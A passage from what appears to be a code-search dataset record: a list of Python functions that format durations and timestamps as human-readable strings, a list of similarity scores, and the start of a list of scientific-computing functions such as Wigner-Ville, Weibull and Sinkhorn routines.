'd'), (3600, 'h', 'h'),\n (60, 'm', 'm'), (1, 's', 's')]\n else:\n units = [(86400, ' day', ' days'), (3600, ' hour', ' hours'),\n (60, ' minute', ' minutes'), (1, ' second', ' seconds')]\n\n if seconds < 0:\n seconds = -seconds\n suffix = ' ago'\n else:\n suffix = ''\n\n pieces = []\n for uvalue, uname, uname_plural in units[:-1]:\n if seconds >= uvalue:\n val = int(seconds // uvalue)\n pieces.append(f'{val:d}{uname_plural if val > 1 else uname}')\n seconds %= uvalue\n elif keep_zeros and pieces:\n pieces.append(f'0{uname}')\n\n uname, uname_plural = units[-1][1:]\n if seconds > np.finfo(np.float64).eps:\n pieces.append(f'{seconds:.4g}{uname_plural if seconds > 1 else uname}')\n elif not pieces or keep_zeros:\n pieces.append(f'0{uname}')\n\n return ' '.join(pieces) + suffix", "def format(t):\n tenths = t % 10\n seconds = (t // 10) % 60\n minutes = (t // 10) // 60\n if seconds < 10:\n seconds_str = '0' + str(seconds)\n else:\n seconds_str = str(seconds)\n t_string = str(minutes) + ':' + seconds_str + '.' 
+ str(tenths)\n return t_string", "def _get_display_duration(self):\n duration = self.duration\n return '%dmn' % duration if duration < 60 else '%dh%dmn' % (duration / 60, duration % 60)", "def getTimeString(tm):\n if not isinstance(tm, int):\n tm = int(tm)\n\n if tm < 60:\n return '%d second%s' % (tm, 's' if tm > 1 else '')\n\n if 60 <= tm < 3600:\n tm = round(tm / 60)\n return '%d minute%s' % (tm, 's' if tm > 1 else '')\n\n tm = round(tm / 3600)\n return '%d hour%s' % (tm, 's' if tm > 1 else '')", "def timedelta_to_str(obj):\n seconds = int(obj.seconds) % 60\n minutes = int(obj.seconds / 60) % 60\n hours = int(obj.seconds / 3600) % 24\n return '%d %02d:%02d:%02d' % (obj.days, hours, minutes, seconds)", "def str_timedelta(seconds):\n\n hour_minute = \"\"\n\n if seconds > 3600:\n hour_minute += str(int(seconds / 3600.0)) + \" h \"\n\n if seconds > 60:\n hour_minute += str(int(seconds / 60) % 60) + \" min \"\n\n return hour_minute + str(seconds % 60) + \" s\"", "def relativeTime(date):\n diff = datetime.utcnow() - date\n\n if diff.days > 7 or diff.days < 0:\n return date.ctime()\n elif diff.days == 1:\n return '1 day ago'\n elif diff.days > 1:\n return '%d days ago' % diff.days\n elif diff.seconds <= 1:\n return 'just now'\n elif diff.seconds < 60:\n return '%d seconds ago' % diff.seconds\n elif diff.seconds < (60 * 2):\n return '1 minute ago'\n elif diff.seconds < (60 * 60):\n return '%d minutes ago' % (diff.seconds / 60)\n elif diff.seconds < (60 * 60 * 2):\n return '1 hour ago'\n else:\n return '%d hours ago' % (diff.seconds / (60 * 60))", "def getTimeString():\n\tfrom time import strftime\n\treturn strftime(\"%d-%m-%Y__%H-%M-%S\")", "def get_readable_time(delta):\n _m, _s = divmod(delta.seconds, 60)\n _h, _m = divmod(_m, 60)\n _d = delta.days\n if _d > 0:\n run_time = \"{}d {}h\".format(_d, _h)\n elif _h > 0:\n run_time = \"{}h {}m\".format(_h, _m)\n elif _m > 0:\n run_time = \"{}m {}s\".format(_m, _s)\n else:\n run_time = \"{}s\".format(_s)\n return run_time", "def timetext(delta, resultion = 1, bare=True):\r\n chunks = (\r\n (60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),\r\n (60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),\r\n (60 * 60 * 24, lambda n : ungettext('day', 'days', n)),\r\n (60 * 60, lambda n: ungettext('hour', 'hours', n)),\r\n (60, lambda n: ungettext('minute', 'minutes', n)),\r\n (1, lambda n: ungettext('second', 'seconds', n))\r\n )\r\n delta = max(delta, timedelta(0))\r\n since = delta.days * 24 * 60 * 60 + delta.seconds\r\n for i, (seconds, name) in enumerate(chunks):\r\n count = math.floor(since / seconds)\r\n if count != 0:\r\n break\r\n\r\n from r2.lib.strings import strings\r\n if count == 0 and delta.seconds == 0 and delta != timedelta(0):\r\n n = math.floor(delta.microseconds / 1000)\r\n s = strings.number_label % (n, ungettext(\"millisecond\", \r\n \"milliseconds\", n))\r\n else:\r\n s = strings.number_label % (count, name(int(count)))\r\n if resultion > 1:\r\n if i + 1 < len(chunks):\r\n # Now get the second item\r\n seconds2, name2 = chunks[i + 1]\r\n count2 = (since - (seconds * count)) / seconds2\r\n if count2 != 0:\r\n s += ', %d %s' % (count2, name2(count2))\r\n if not bare: s += ' ' + _('ago')\r\n return s", "def shorten_time(self, seconds):\n if seconds < 60:\n # less than 1 minute\n val = str(seconds) + \" sec\"\n elif seconds < 3600:\n # if the seconds is less than 1hr\n num = self.rounded_number(seconds, 60)\n if num == \"60\":\n val = '1h'\n else:\n val = num + \"m\"\n elif (seconds < 60*60*24):\n # if the number is 
less than 1 day\n num = self.rounded_number(seconds, 60 * 60)\n if num == \"24\":\n val = \"1d\"\n else:\n val = num + \"h\"\n else:\n num = self.rounded_number(seconds, 60*60*24)\n val = num + \"d\"\n\n return val", "def delta_fmt(delta):\n secs = delta.total_seconds()\n\n if secs < 60:\n return '%0.2d secs' % secs\n\n hours = 0\n if secs > 3600:\n hours = secs / 3600.0\n secs -= int(hours) * 3600\n\n mins = secs / 60\n secs -= mins * 60\n\n return '%0.2d:%0.2d' % (hours, mins)", "def format_time(seconds: float) -> str:\n # return str(timedelta(seconds=seconds))[2:10] if seconds != 0.0 else \"00:00.00\"\n if seconds == 0.0:\n return \"00.00\"\n elif seconds < 60.0:\n return str(timedelta(seconds=seconds))[5:10] # SS:DD, d decimal\n else:\n return str(timedelta(seconds=seconds))[2:7] # MM:SS", "def _timestamp(self):\n\n retval = []\n\n if self.log_level >= _Log.DEBUG:\n retval.append('%f: ' % (time.time() - self.start_time,))\n\n return ''.join(retval)", "def seconds2str(seconds):\n\n seconds = abs(seconds)\n days = hours = minutes = 0\n\n if seconds >= 86400:\n days = seconds / 86400\n seconds = (days - int(days)) * 86400\n\n if seconds >= 3600:\n hours = seconds / 3600\n seconds = (hours - int(hours)) * 3600\n\n if seconds >= 60:\n minutes = seconds / 60\n seconds = (minutes - int(minutes)) * 60\n\n strtime = \"\"\n strtime += f\"{int(days)}d\" if days else \"\"\n strtime += f\"{int(hours)}h\" if hours else \"\"\n strtime += f\"{int(minutes)}m\" if minutes else \"\"\n strtime += f\"{round(seconds)}s\" if seconds else \"\"\n\n return strtime if strtime else \"0s\"", "def time_amount(time_unit: str, countdown: relativedelta) -> str:\n t = getattr(countdown, time_unit)\n if t != 0 :\n return f\"{t} {time_unit}\"\n else:\n return \"\"", "def get_duration(self):\n try:\n if self.is_skipped:\n return \"00:00\"\n assert self.start_time\n assert self.stop_time\n if self.stop_time < self.start_time:\n return \"XX:XX\"\n return(\n f\"{str(int(self.stop_time - self.start_time) // 60).zfill(2)}:\"\n f\"{str(int(self.stop_time - self.start_time) % 60).zfill(2)}\")\n\n except Exception: # pylint: disable=broad-except\n self.__logger.error(\"Please run test before getting the duration\")\n return \"XX:XX\"", "def timer(elapsed):\n hours, rem = divmod(elapsed, 3600)\n minutes, seconds = divmod(rem, 60)\n if int(seconds) == 0:\n return 'UNKNOWN'\n else:\n return '{:0>2}:{:0>2}:{:0>2}'.format(\n int(hours), int(minutes), int(seconds))", "def format_time(t):\n m, s = divmod(t, 60)\n h, m = divmod(m, 60)\n if h:\n return f\"{h:2.0f}hr {m:2.0f}min {s:4.1f}s\"\n elif m:\n return f\"{m:2.0f}min {s:4.1f}s\"\n else:\n return f\"{s:4.1f}s\"", "def lockout_duration(self, obj):\n delta = relativedelta(obj.modified, obj.created)\n return humanize_delta(delta)", "def reformat_execution_time(time_measured) -> tuple:\n d = time_measured // (3600 * 24)\n t_left = time_measured % (3600 * 24) # seconds left, not enough for a day\n h = t_left // 3600\n t_left = t_left % 3600 # seconds left, not enough for an hour\n m = t_left // 60\n t_left = t_left % 60 # seconds left, not enough for a minute\n s = t_left\n return d, h, m, s", "def timestamp():\n tmptz = time.timezone\n sign_str = '+'\n if tmptz > 0:\n sign_str = '-'\n tmptz_hours = int(tmptz / 3600)\n\n return str(\"%s%s%02d:%02d\" % (time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime()), sign_str, abs(tmptz_hours),\n int(tmptz / 60 - tmptz_hours * 60)))", "def get_incident_duration(incident):\n started = dateparse(incident.created_at)\n if incident.status == 
'resolved':\n last_update = dateparse(incident.last_status_change_at)\n else:\n last_update = datetime.now()\n # Convert duration to a nice string representation\n return str(last_update - started)", "def time_to_string(value):\n if value == gst.CLOCK_TIME_NONE:\n return \"--:--:--.---\"\n ms = value / gst.MSECOND\n sec = ms / 1000\n ms = ms % 1000\n mins = sec / 60\n sec = sec % 60\n hours = mins / 60\n mins = mins % 60\n return \"%02d:%02d:%02d.%03d\" % (hours, mins, sec, ms)", "def timestamp():\n return datetime.now().strftime('%H:%M:%S %m-%d')", "def get_submission_age(submission):\n age = datetime.utcnow().replace(tzinfo=utc) - submission.submission_time\n if age.days == 1:\n return \"1 day\"\n elif age.days > 1:\n return \"%d days\" % age.days\n elif int(age.seconds) > 3600:\n return \"%d hours\" % (age.seconds/3600)\n elif age.seconds > 120:\n return \"%d minutes\" % (age.seconds/60)\n elif age.seconds > 60:\n return \"1 minute\"\n elif age.seconds > 1:\n return \"%d seconds\" % age.seconds\n else:\n return \"1 second\"", "def get_time_stamp_str() -> str:\n return datetime.datetime.now().strftime(DateFormat)", "def compact_timesince(timesince):\n\n # Replace 'an hour', 'ago'.\n timesince = timesince.replace('an hour', '1h').replace('a minute ago', '1m').replace('ago', '')\n\n # Replace long words with letters. (2 days, 3 hours -> 2 d, 3 h)\n timesince = timesince.replace('seconds', 's').replace('second', 's')\n timesince = timesince.replace('minutes', 'm').replace('minute', 'm')\n timesince = timesince.replace('hours', 'h').replace('hour', 'h')\n timesince = timesince.replace('days', 'd').replace('day', 'd')\n timesince = timesince.replace('weeks', 'w').replace('week', 'w')\n timesince = timesince.replace('months', 'mo').replace('month', 'mo')\n timesince = timesince.replace('years', 'y').replace('year', 'y')\n\n # Remove space between digit and unit. (2 d, 3h -> 2d, 3h)\n timesince = timesince.replace('\\xa0', '')\n\n # Take only the first, usually interesting part. 
(2d, 3h -> 2d)\n timesince = timesince.split(',', 1)[0]\n return timesince", "def getFormattedText(self):\r\n h = \"00\"\r\n m = \"00\"\r\n s = \"00\"\r\n if(self.seconds < 10):\r\n s = \"0\" + str(self.seconds)\r\n else:\r\n s = str(self.seconds)\r\n\r\n if(self.minutes < 10):\r\n m = \"0\" + str(self.minutes)\r\n else:\r\n m = str(self.minutes)\r\n\r\n if(self.hours < 10):\r\n h = \"0\" + str(self.hours)\r\n else:\r\n h = str(self.hours)\r\n\r\n return h + \":\" + m + \":\" + s", "def beautify_length(length):\n sec = length / gst.SECOND\n mins = sec / 60\n sec = sec % 60\n hours = mins / 60\n mins = mins % 60\n\n parts = []\n if hours:\n parts.append(ngettext(\"%d hour\", \"%d hours\", hours) % hours)\n\n if mins:\n parts.append(ngettext(\"%d minute\", \"%d minutes\", mins) % mins)\n\n if not hours and sec:\n parts.append(ngettext(\"%d second\", \"%d seconds\", sec) % sec)\n\n return \", \".join(parts)", "def timedelta_nice_repr(timedelta, display='long', sep=', '):\n if not isinstance(timedelta, datetime.timedelta):\n raise TypeError('First argument must be a timedelta.')\n result = []\n weeks = int(timedelta.days / 7)\n days = timedelta.days % 7\n hours = int(timedelta.seconds / 3600)\n minutes = int((timedelta.seconds % 3600) / 60)\n seconds = timedelta.seconds % 60\n if display == 'minimal':\n words = ['w', 'd', 'h', 'm', 's']\n elif display == 'short':\n words = [' wks', ' days', ' hrs', ' min', ' sec']\n elif display == 'long':\n words = [' weeks', ' days', ' hours', ' minutes', ' seconds']\n else:\n # Use django template-style formatting.\n # Valid values are d, g, G, h, H, i, s.\n return re.sub(r'([dgGhHis])', lambda x: '%%(%s)s' % x.group(), display) % {\n 'd': days,\n 'g': hours,\n 'G': hours if hours > 9 else '0%s' % hours,\n 'h': hours,\n 'H': hours if hours > 9 else '0%s' % hours,\n 'i': minutes if minutes > 9 else '0%s' % minutes,\n 's': seconds if seconds > 9 else '0%s' % seconds\n }\n values = [weeks, days, hours, minutes, seconds]\n for i in range(len(values)):\n if values[i]:\n if values[i] == 1 and len(words[i]) > 1:\n result.append('%i%s' % (values[i], words[i].rstrip('s')))\n else:\n result.append('%i%s' % (values[i], words[i]))\n # Values with less than one second, which are considered zeroes.\n if len(result) == 0:\n # Display as 0 of the smallest unit.\n result.append('0%s' % (words[-1]))\n return sep.join(result)", "def _get_timestamp():\n return str(int(time.time()))", "def get_remaining(self) -> str:\n hex_remaining_time = hexlify(self.message)[294:302]\n int_remaining_time_seconds = int(\n hex_remaining_time[6:8]\n + hex_remaining_time[4:6]\n + hex_remaining_time[2:4]\n + hex_remaining_time[0:2],\n 16,\n )\n return seconds_to_iso_time(int_remaining_time_seconds)" ]
[ "0.7199235", "0.6999816", "0.6862485", "0.6823745", "0.6743255", "0.6654757", "0.66247755", "0.65492713", "0.64874226", "0.64806837", "0.6469421", "0.64674145", "0.64304537", "0.6402844", "0.6387063", "0.6360706", "0.6358006", "0.6357516", "0.63572836", "0.63446885", "0.63081884", "0.6295959", "0.62707317", "0.6260188", "0.6257234", "0.6256976", "0.6242369", "0.6215239", "0.6212859", "0.6208622", "0.62054664", "0.6196602", "0.61826354", "0.616728", "0.61652344", "0.6136233", "0.6130773", "0.61242145", "0.6122973", "0.61215174", "0.61212176", "0.61143965", "0.6114291", "0.6103086", "0.609898", "0.6093879", "0.60921305", "0.6088485", "0.60852176", "0.6079304", "0.6077019", "0.607617", "0.6073762", "0.6067056", "0.6060559", "0.6054636", "0.60491985", "0.6036922", "0.6034889", "0.6032412", "0.6026117", "0.60192376", "0.59855247", "0.5980881", "0.5980455", "0.59786135", "0.5965281", "0.59572136", "0.59565634", "0.5954361", "0.5953779", "0.5953674", "0.5936866", "0.5934517", "0.59316605", "0.5930879", "0.5911246", "0.5910439", "0.5898305", "0.58880407", "0.5879729", "0.586672", "0.58639216", "0.5861097", "0.5839218", "0.5838761", "0.58375335", "0.58331656", "0.5830062", "0.58256775", "0.5817877", "0.5817564", "0.5810305", "0.5802106", "0.5799352", "0.5793889", "0.57925636", "0.57830286", "0.5779936", "0.57781005" ]
0.7168039
1
Wigner Ville Distribution and Pseudo Wigner Ville Distribution.
def wvd(signal, sampling_rate=1000, n_freqbins=None, analytical_signal=True, method="WignerVille"): # Compute the analytical signal if analytical_signal: signal = scipy.signal.hilbert(signal_detrend(signal)) # Pre-processing if n_freqbins is None: n_freqbins = 256 if method in ["pseudoWignerVille", "pwvd"]: fwindows = np.zeros(n_freqbins + 1) fwindows_mpts = len(fwindows) // 2 windows_length = n_freqbins // 4 windows_length = windows_length - windows_length % 2 + 1 windows = np.hamming(windows_length) fwindows[fwindows_mpts + np.arange(-windows_length // 2, windows_length // 2)] = windows else: fwindows = np.ones(n_freqbins + 1) fwindows_mpts = len(fwindows) // 2 time = np.arange(len(signal)) * 1.0 / sampling_rate # This is discrete frequency (should we return?) if n_freqbins % 2 == 0: frequency = np.hstack((np.arange(n_freqbins / 2), np.arange(-n_freqbins / 2, 0))) else: frequency = np.hstack( (np.arange((n_freqbins - 1) / 2), np.arange(-(n_freqbins - 1) / 2, 0)) ) tfr = np.zeros((n_freqbins, time.shape[0]), dtype=complex) # the time-frequency matrix tausec = round(n_freqbins / 2.0) winlength = tausec - 1 # taulens: len of tau for each step taulens = np.min( np.c_[ np.arange(signal.shape[0]), signal.shape[0] - np.arange(signal.shape[0]) - 1, winlength * np.ones(time.shape), ], axis=1, ) conj_signal = np.conj(signal) # iterate and compute the wv for each indices for idx in range(time.shape[0]): tau = np.arange(-taulens[idx], taulens[idx] + 1).astype(int) # this step is required to use the efficient DFT indices = np.remainder(n_freqbins + tau, n_freqbins).astype(int) tfr[indices, idx] = ( fwindows[fwindows_mpts + tau] * signal[idx + tau] * conj_signal[idx - tau] ) if (idx < signal.shape[0] - tausec) and (idx >= tausec + 1): tfr[tausec, idx] = ( fwindows[fwindows_mpts + tausec] * signal[idx + tausec] * np.conj(signal[idx - tausec]) + fwindows[fwindows_mpts - tausec] * signal[idx - tausec] * conj_signal[idx + tausec] ) tfr[tausec, idx] *= 0.5 # Now tfr contains the product of the signal segments and its conjugate. # To find wd we need to apply fft one more time. tfr = np.fft.fft(tfr, axis=0) tfr = np.real(tfr) # continuous time frequency frequency = 0.5 * np.arange(n_freqbins, dtype=float) / n_freqbins * sampling_rate return frequency, time, tfr
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wpi(nev,mu):\n return np.sqrt(nev*eV2J**2/(mp*mu*epsilon));", "def test_wignerVille(self):\n datafile = os.path.join(os.path.dirname(__file__), 'data', 'wv.npz')\n rec = np.load(datafile)\n wv = abs(wigner_ville_spectrum(\n signal_bursts(), 10, 3.5, smoothing_filter='gauss',\n verbose=False))\n # No NaNs are supposed to be in the output.\n self.assertEqual(np.isnan(wv).any(), False)\n rms1 = rms(rec['wv_250_500_25'], wv[250:500:25])\n rms2 = rms(rec['wv_750_1000_25'], wv[750:1000:25])\n self.assertEqual(True, rms1 < 1e-6)\n self.assertEqual(True, rms2 < 1e-6)", "def Wp(self):\n from scipy.integrate import quad\n Eth = 1.22e-3\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n Wp = quad(lambda x: x * self._particle_distribution(x), Eth, np.Inf)[0]\n\n return (Wp * u.TeV).to('erg')", "def sweep25W(self):\n return 28.8", "def hellinger_weighted(mu1, sigma1, pi1, mu2, sigma2, pi2):\n sigma1norm = np.linalg.norm(sigma1)\n sigma2norm = np.linalg.norm(sigma2)\n X0 = np.zeros(mu1.shape)\n i = 2 * (sigma1norm**(1.0/4)) * (sigma2norm**(1.0/4)) * np.sqrt(2*np.pi) *\\\n gmm.mulnormpdf(X0, mu1-mu2, 2*sigma1 + 2*sigma2)\n #return np.sqrt(pi1*pi2) * (1-2*i)\n return 1-i[0]", "def wpe(nev):\n return np.sqrt(nev*eV2J**2/(me*epsilon));", "def collpi2(Te,nev,v):\n return vcrit(Te)/2./v**3*collnu(Te,nev)", "def vonMises(self):\n s = self.voigt\n return ((1 / 2) * ((s[0] - s[1])**2\n + (s[1] - s[2])**2\n + (s[2] - s[0])**2\n + 6 * (s[3]**2 + s[4]**2 + s[5]**2))) ** (1 / 2)", "def Mo96(self,dc,nu):\n return 1. + (nu**2.-1.)/dc", "def W(self):\n if not self.isVaild():\n pass\n return self.Wq() + 1.0/self.muy", "def sweep50W(self):\n return 25.9", "def _base_dist(self, *args, **kwargs):\n return tfd.TransformedDistribution(\n distribution=tfd.Uniform(low=0.0, high=1.0),\n bijector=tfp.bijectors.Invert(tfp.bijectors.Weibull(*args, **kwargs)),\n name=\"Weibull\",\n )", "def francois_viete():\n\n print(\"Francois Viete\\n==============\")\n\n iterations = 28 # 28 to 1000000000 makes no diff\n numerator = 0.0\n pi = 1.0\n\n for i in range(1, iterations + 1):\n numerator = math.sqrt(2.0 + numerator)\n pi*= (numerator / 2.0)\n \n pi = (1.0 / pi) * 2.0\n\n print(\"iterations: \" + str(iterations))\n print_as_text(pi)", "def bernstein_surface(i, j, nU, nV, u, v):\n return np.outer(comb(nU, i) * (u ** (nU - i)) * ((1 - u) ** i),\n comb(nV, j) * (v ** (nV - j)) * ((1 - v) ** j))", "def initializeDistribution(self):\n if (self.lowerBoundUsed == False and self.upperBoundUsed == False):\n self._distribution = distribution1D.BasicWeibullDistribution(self.k,self.lambdaVar,self.low)\n self.lowerBound = self.low\n self.upperBound = sys.float_info.max\n else:\n if self.lowerBoundUsed == False:\n self.lowerBound = self.low\n if self.upperBoundUsed == False:\n self.upperBound = sys.float_info.max\n self._distribution = distribution1D.BasicWeibullDistribution(self.k,self.lambdaVar,self.lowerBound,self.upperBound,self.low)", "def CuN17vol(n,h,w,V):\n Vshell = 2*ZCE_GaAs(n,V)*(h-ZCE_GaAs(n,V)) + w*ZCE_GaAs(n,V)\n Vcore = (w-2*ZCE_GaAs(n,V))*(h-ZCE_GaAs(n,V))\n return Vshell*1e14,Vcore*1e14", "def make_voigt(self):\n\n hwhm_doppler = pystark.get_fwhm_doppler(self.species, self.n_upper, self.n_lower, self.temp) / 2\n hwhm_stark = pystark.get_fwhm_stark(self.species, self.n_upper, self.n_lower, self.e_dens) / 2\n sigma_doppler = hwhm_doppler / np.sqrt(2 * np.log(2))\n\n ls_sd = np.real(wofz(((self.freq_axis - self.freq_centre) + 1j * hwhm_stark) / sigma_doppler / np.sqrt(2))) / \\\n sigma_doppler / np.sqrt(2 
* np.pi)\n # (see https://scipython.com/book/chapter-8-scipy/examples/the-voigt-profile/)\n\n ls_szd = self.zeeman_split(self.freq_axis, self.freq_centre, ls_sd)\n\n return ls_szd", "def pi_chudnovsky_bs(self,digits):\n C = 640320\n C3_OVER_24 = C**3 // 24\n def bs(a, b):\n \"\"\"\n Computes the terms for binary splitting the Chudnovsky infinite series\n \n a(a) = +/- (13591409 + 545140134*a)\n p(a) = (6*a-5)*(2*a-1)*(6*a-1)\n b(a) = 1\n q(a) = a*a*a*C3_OVER_24\n \n returns P(a,b), Q(a,b) and T(a,b)\n \"\"\"\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab\n # how many terms to compute\n DIGITS_PER_TERM = math.log10(C3_OVER_24/6/2/6)\n N = int(digits/DIGITS_PER_TERM + 1)\n # Calclate P(0,N) and Q(0,N)\n P, Q, T = bs(0, N)\n one_squared = mpz(10)**(2*digits)\n sqrtC = gmpy2.isqrt((10005*one_squared))\n return (Q*426880*sqrtC) // T", "def deltaW(N, m, h):\n return np.random.normal(0., np.sqrt(h), (N, m))\n # return levy.rvs(0., 1e-11, (N, m))+np.random.normal(0., np.sqrt(h), (N, m)) #levy distribution\n # return cauchy.rvs(0., 1e-4, (N, m)) #Cauchy distribution", "def generar_polinomio(self):\n\t\tself.poli = 0\n\t\tfor i in range(len(self.v)):\n\t\t\tpoli2 = n(self.diferencias_divididas(self.v[0:i+1]))\n\t\t\tfor j in range(i):\n\t\t\t\tpoli2 *= self.x-self.v[j][0]\n\t\t\tself.poli = self.poli + poli2", "def worddist(self):\n #return (self.n_z_t + self.beta) / (self.n_z[:, numpy.newaxis] + self.V * self.beta), len(self.n_z)\n return (self.n_z_t + self.n_w_d + self.beta) / (self.n_z[:, numpy.newaxis] + self.n_w[:, numpy.newaxis] + self.V * self.beta), len(self.n_z)", "def wci(B,mu):\n return eV2J*B/mp/mu", "def w_DE(self, z):\n return self.w0+self.wa*z/(1.+z)", "def pp(self):\n \n return np.cross(self.v, self.w) / np.dot(self.w, self.w)", "def silverman(n: int, ess: float) -> float:\n\n return (ess * (n + 2) / 4) ** (-1 / (n + 4))", "def wigner_gaunt(l1, l2, m):\n pref = sqrt((2*l1 + 1)*(2*l2 + 1)/(4*pi))\n return np.array([pref*sqrt(2*lpp + 1)*float(wigner_3j(l1,l2,lpp,m,-m,0)*wigner_3j(l1,l2,lpp,0,0,0))\n for lpp in range(abs(l1-l2), l1+l2+1, 2)])", "def lkruskalwallish(*args):\r\n args = list(args)\r\n n = [0]*len(args)\r\n all = []\r\n n = map(len,args)\r\n for i in range(len(args)):\r\n all = all + args[i]\r\n ranked = rankdata(all)\r\n T = tiecorrect(ranked)\r\n for i in range(len(args)):\r\n args[i] = ranked[0:n[i]]\r\n del ranked[0:n[i]]\r\n rsums = []\r\n for i in range(len(args)):\r\n rsums.append(sum(args[i])**2)\r\n rsums[i] = rsums[i] / float(n[i])\r\n ssbn = sum(rsums)\r\n totaln = sum(n)\r\n h = 12.0 / (totaln*(totaln+1)) * ssbn - 3*(totaln+1)\r\n df = len(args) - 1\r\n if T == 0:\r\n raise ValueError, 'All numbers are identical in lkruskalwallish'\r\n h = h / float(T)\r\n return h, chisqprob(h,df)", "def _derW(self, w, x, y, z):\n raise NotImplementedError()", "def _pettifor_numbers():\n return { \"Li\": 0.45,\n \"Be\": 1.5,\n \"B\": 2.0,\n \"C\": 2.5,\n \"N\": 3.0, \n \"O\": 3.5,\n \"F\": 4.0,\n \n 
\"Na\": 0.4,\n \"Mg\": 1.28,\n \"Al\": 1.66,\n \"Si\": 1.92,\n \"P\": 2.18,\n \"S\": 2.44,\n \"Cl\": 2.70,\n \n \"K\": 0.35,\n \"Ca\": 0.60,\n \"Sc\": 0.74,\n \"Ti\": 0.79,\n \"V\": 0.84,\n \"Cr\": 0.89,\n \"Mn\": 0.94,\n \"Fe\": 0.99,\n \"Co\": 1.04,\n \"Ni\": 1.09,\n \"Cu\": 1.20,\n \"Zn\": 1.44,\n \"Ga\": 1.68,\n \"Ge\": 1.92,\n \"As\": 2.16,\n \"Se\": 2.40,\n \"Br\": 2.64,\n\n \"Rb\": 0.30,\n \"Sr\": 0.55,\n \"Y\": 0.70,\n \"Zr\": 0.76,\n \"Nb\": 0.82,\n \"Mo\": 0.88,\n \"Tc\": 0.94,\n \"Ru\": 1.00,\n \"Rh\": 1.06,\n \"Pd\": 1.12,\n \"Ag\": 1.18,\n \"Cd\": 1.36,\n \"In\": 1.60,\n \"Sn\": 1.84,\n \"Sb\": 2.08,\n \"Te\": 2.32,\n \"I\": 2.56,\n \n \"Cs\": 0.25,\n \"Ba\": 0.50,\n \"La\": 0.748,\n \"Hf\": 0.775,\n \"Ta\": 0.83,\n \"W\": 0.885,\n \"Re\": 0.94,\n \"Os\": 0.995,\n \"Ir\": 1.05,\n \"Pt\": 1.105,\n \"Au\": 1.16,\n \"Hg\": 1.32,\n \"Tl\": 1.56,\n \"Pb\": 1.80,\n \"Bi\": 2.04,\n \"Po\": 2.28, \n \"At\": 2.52 }", "def ppd(self):\n return math.sqrt(np.dot(self.v, self.v) / np.dot(self.w, self.w) )", "def make_voig(w,minZ,maxZ,m=mz0,fixw=False):\n cmds = []\n cmds.append('m[%s,%s,%s]'%(m,minZ,maxZ))\n cmds.append('width[2.49,0,5.0]')\n cmds.append('sigma[1,0,5.0]')\n cmds.append(\"RooVoigtian::voig(x,m,width,sigma)\")\n [w.factory(cmd) for cmd in cmds]\n if fixw:\n w.var('width').setConstant(kTRUE) if w.var('width') else None\n return w.pdf('voig'), kFALSE", "def sinkhorn_log(mu,nu,c,epsilon, \n options={'niter':1000, 'tau':-0.5, 'rho':np.inf}):\n\n for key,val in zip(['tau','rho','niter'],[-.5,np.inf,500]):\n options.setdefault(key, val)\n rho,tau,niter = options['rho'],options['tau'],options['niter']\n\n lam = rho/(rho+epsilon)\n if rho==np.inf:\n lam=1.0\n\n H1 = np.ones_like(mu)\n H2 = np.ones_like(nu)\n\n ave = lambda tau, u, u1: tau*u+(1-tau)*u1\n\n lse = lambda A: np.log(np.sum(np.exp(A),axis=1))\n M = lambda u,v:(-c+u[:,np.newaxis]@H2[np.newaxis,:] + H1[:,np.newaxis]@v[np.newaxis,:] )/epsilon\n\n # kullback divergence\n H = lambda p: -np.sum( p.flatten()*(np.log(p.flatten()+1e-20)-1) )\n KL = lambda h,p: np.sum( h.flatten()* np.log( h.flatten()/p.flatten() ) - h.flatten()+p.flatten())\n KLd = lambda u,p: np.sum( p.flatten()*( np.exp(-u.flatten()) -1) )\n dotp = lambda x,y: np.sum(x*y); \n\n err,Wprimal,Wdual = [],[],[]\n u = np.zeros_like(mu)\n v = np.zeros_like(nu)\n\n for _ in range(niter):\n u1=u\n u = ave(tau, u, lam*epsilon*np.log(mu) - lam*epsilon*lse( M(u,v) ) + lam*u )\n v = ave(tau, v, lam*epsilon*np.log(nu) - lam*epsilon*lse( M(u,v).T) + lam*v )\n gamma = np.exp(M(u,v))\n\n if rho==np.inf: \n Wprimal.append(dotp(c,gamma) - epsilon*H(gamma))\n Wdual.append( dotp(u,mu) + dotp(v,nu) - epsilon*np.sum(gamma) )\n err.append( np.linalg.norm( np.sum(gamma,axis=1)-mu ) )\n else:\n Wprimal.append( dotp(c,gamma) - epsilon*H(gamma) \\\n + rho*KL(np.sum(gamma,axis=1),mu) \\\n + rho*KL(np.sum(gamma,axis=0),nu) )\n\n Wdual.append( -rho*KLd(u/rho,mu) - rho*KLd(v/rho,nu) \\\n - epsilon*np.sum( gamma))\n err.append(np.linalg.norm(u-u1, ord=1) )\n \n WDistance = Wprimal[-1]+epsilon*H(gamma)\n\n return gamma,Wprimal,Wdual,err,WDistance", "def get_van_Der_Waals_radius(self):\n return self.van_Der_Waals_radius", "def vcrit(Te):\n vcrit = 3.0*np.sqrt(np.pi)/4.*(2.*eV2J/me)**(1.5)*(me/mi)*np.sqrt(Te**3.)\n return vcrit", "def psVoigt(self, X, xm, amp, w, m):\n return m * self.lorentz(X, xm, amp, w) + (1-m) * self.gauss(X, xm, amp, w)", "def birch_murnaghan(p, v):\n return p[0]+9.0/16*p[3]*p[1]*( ( (p[3]/v)**(2.0/3)-1 )**3*p[2]+\n ( (p[3]/v)**(2.0/3)-1 )**2*\n ( 6-4*(p[3]/v)**(2.0/3) ) )", 
